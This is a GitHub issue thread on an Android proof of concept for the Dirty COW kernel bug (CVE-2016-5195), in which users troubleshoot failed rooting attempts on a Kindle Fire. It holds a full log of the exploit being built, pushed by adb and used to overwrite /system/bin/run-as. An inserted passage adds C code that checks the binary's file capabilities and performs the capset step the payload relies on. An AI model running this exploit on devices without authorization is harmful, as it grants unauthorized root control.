timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

Issues on Kindle Fire 5thgen (KFFOWI) #8

Closed aidanbh closed 8 years ago

aidanbh commented 8 years ago

My device hard-reboots as soon as the exploit finishes, leading to the following output. Any suggestions?

[bithakr@localhost CVE-2016-5195]$ make run
make: *** No rule to make target 'run'.  Stop.
[bithakr@localhost CVE-2016-5195]$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
make[1]: Entering directory '/home/bithakr/dev/CVE-2016-5195'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/bithakr/dev/CVE-2016-5195'
adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
[100%] /data/local/tmp/dirtycow
adb push libs/armeabi/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6ffffffe arg 0x600
WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6fffffff arg 0x1
warning: new file size (13776) and file old size (9444) differ

size 13776

[*] mmap 0xb6f2c000
[*] exploit (patch)
[*] currently 0xb6f2c000=464c457f
[*] madvise = 0xb6f2c000 13776
[*] madvise = 0 1048576
adb shell /system/bin/run-as
error: no devices/emulators found
make: *** [Makefile:14: root] Error 1

aidanbh commented 8 years ago

It doesn't look like run-as is setuid on my device (but how else would it work?):

-rwxr-x--- root shell 9444 2016-06-24 15:13 run-as

joel0 commented 8 years ago

Linux capabilities are how the UID can be set without the setuid bit.

BsnNick commented 8 years ago

@bithakr I am getting the same issue. I get the same permission in /system/bin for run-as, even after setting it to 777 in /data/local/tmp.

Edit: I also have to set dirtycow file to 777 in /data/local/tmp for this PoC to run, otherwise I get "can't execute: Permission denied." I am using a Verizon SnapDragon Galaxy S7 Edge by the way.

timwr commented 8 years ago

@bithakr it looks like the device is vulnerable but I don't think it has Linux capabilities (< 4.2?). Maybe you can try https://github.com/timwr/CVE-2016-5195/tree/oldcow (or just comment out the capset stuff in run-as.c). Many thanks

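The two comments above (joel0 on capabilities replacing the setuid bit, timwr on the capset step in run-as.c) describe the mechanism the PoC depends on: /system/bin/run-as carries a security.capability xattr that grants CAP_SETUID and CAP_SETGID, and the replacement binary raises those into its effective set before calling setuid(0). The example below is added here and is not code from timwr/CVE-2016-5195. It decodes that xattr (the kernel's vfs_cap_data layout) so a device can be checked before running the exploit, and shows the capget/capset step that fails on a device without capabilities. The struct and function names are my own, and the sample byte strings are constructed, not dumped from a real device.

```c
/* Added example, not code from timwr/CVE-2016-5195. Decodes the
 * security.capability xattr that gives run-as CAP_SETUID without a
 * setuid bit, and shows the capset step the PoC's run-as.c performs.
 * Names are my own; SAMPLE_* byte strings are constructed. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define VFS_CAP_REVISION_MASK   0xFF000000u
#define VFS_CAP_REVISION_1      0x01000000u  /* magic + 1 x {permitted, inheritable} */
#define VFS_CAP_REVISION_2      0x02000000u  /* magic + 2 x {permitted, inheritable} */
#define VFS_CAP_REVISION_3      0x03000000u  /* revision 2 + 32-bit rootid */
#define VFS_CAP_FLAGS_EFFECTIVE 0x00000001u  /* permitted set becomes effective on exec */
#define CAP_SETGID 6
#define CAP_SETUID 7

struct filecaps { uint64_t permitted, inheritable; int effective; };

static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Decode a raw xattr value (struct vfs_cap_data). 0 on success, -1 if malformed. */
int decode_vfs_caps(const uint8_t *buf, size_t len, struct filecaps *out) {
    if (len < 4) return -1;
    uint32_t magic = le32(buf), rev = magic & VFS_CAP_REVISION_MASK;
    size_t need = rev == VFS_CAP_REVISION_1 ? 12 : rev == VFS_CAP_REVISION_2 ? 20
                : rev == VFS_CAP_REVISION_3 ? 24 : 0;
    if (need == 0 || len < need) return -1;
    memset(out, 0, sizeof *out);
    out->effective   = (magic & VFS_CAP_FLAGS_EFFECTIVE) != 0;
    out->permitted   = le32(buf + 4);
    out->inheritable = le32(buf + 8);
    if (rev != VFS_CAP_REVISION_1) {           /* second word carries caps 32..63 */
        out->permitted   |= (uint64_t)le32(buf + 12) << 32;
        out->inheritable |= (uint64_t)le32(buf + 16) << 32;
    }
    return 0;
}

/* 1 if the xattr makes the binary start with CAP_SETUID effective,
   0 if it decodes but grants no usable CAP_SETUID, -1 if malformed. */
int file_caps_grant_setuid(const uint8_t *buf, size_t len) {
    struct filecaps fc;
    if (decode_vfs_caps(buf, len, &fc) < 0) return -1;
    return (fc.effective && ((fc.permitted >> CAP_SETUID) & 1)) ? 1 : 0;
}

/* Constructed samples: revision 2 magic with the effective flag set. */
const uint8_t SAMPLE_SETUID_SETGID[] = { 0x01,0,0,0x02, 0xC0,0,0,0, 0,0,0,0, 0,0,0,0, 0,0,0,0 };
const uint8_t SAMPLE_SETGID_ONLY[]   = { 0x01,0,0,0x02, 0x40,0,0,0, 0,0,0,0, 0,0,0,0, 0,0,0,0 };

#ifdef __linux__
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/xattr.h>

/* 1 if path carries file caps (out filled), 0 if it has no
   security.capability xattr, -1 on any other error. */
int read_file_caps(const char *path, struct filecaps *out) {
    uint8_t buf[32];
    ssize_t n = getxattr(path, "security.capability", buf, sizeof buf);
    if (n < 0) return (errno == ENODATA || errno == ENOTSUP) ? 0 : -1;
    return decode_vfs_caps(buf, (size_t)n, out) == 0 ? 1 : -1;
}

/* The "capset stuff": copy the permitted set into the effective set so a
   following setuid(0) is allowed. Returns -1 when capget/capset is not
   supported or CAP_SETUID is not permitted, the situation where the thread
   suggests commenting this step out. */
struct cap_hdr  { uint32_t version; int pid; };
struct cap_data { uint32_t effective, permitted, inheritable; };
int raise_permitted_caps(void) {
    struct cap_hdr hdr = { 0x20080522 /* _LINUX_CAPABILITY_VERSION_3 */, 0 };
    struct cap_data d[2];
    if (syscall(SYS_capget, &hdr, d) < 0) return -1;
    if (!((d[0].permitted >> CAP_SETUID) & 1)) { errno = EPERM; return -1; }
    d[0].effective = d[0].permitted;
    d[1].effective = d[1].permitted;
    return (int)syscall(SYS_capset, &hdr, d);
}

/* Usage on a device: push the binary and run it against /system/bin/run-as. */
int main(int argc, char **argv) {
    const char *path = argc > 1 ? argv[1] : "/system/bin/run-as";
    struct filecaps fc;
    int r = read_file_caps(path, &fc);
    if (r < 0) { perror("getxattr"); return 1; }
    if (r == 0) { printf("%s: no security.capability xattr\n", path); return 0; }
    printf("%s: permitted=%#llx inheritable=%#llx effective-flag=%d CAP_SETUID=%d\n",
           path, (unsigned long long)fc.permitted, (unsigned long long)fc.inheritable,
           fc.effective, (int)((fc.permitted >> CAP_SETUID) & 1));
    return 0;
}
#endif
```

If the checker reports no security.capability xattr on run-as, and the file has no setuid bit either (as in the ls output above), overwriting it with a payload that relies on capset cannot gain root; that is the case for which the oldcow branch or a run-as.c with the capset calls removed is meant.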
aidanbh commented 8 years ago

@timwr That makes sense. I found another way to root my device but I'll try your suggestion to see if it works. It doesn't have Linux capabilities. The base OS is Android 5.0.1 - it runs FireOS 5.3.1.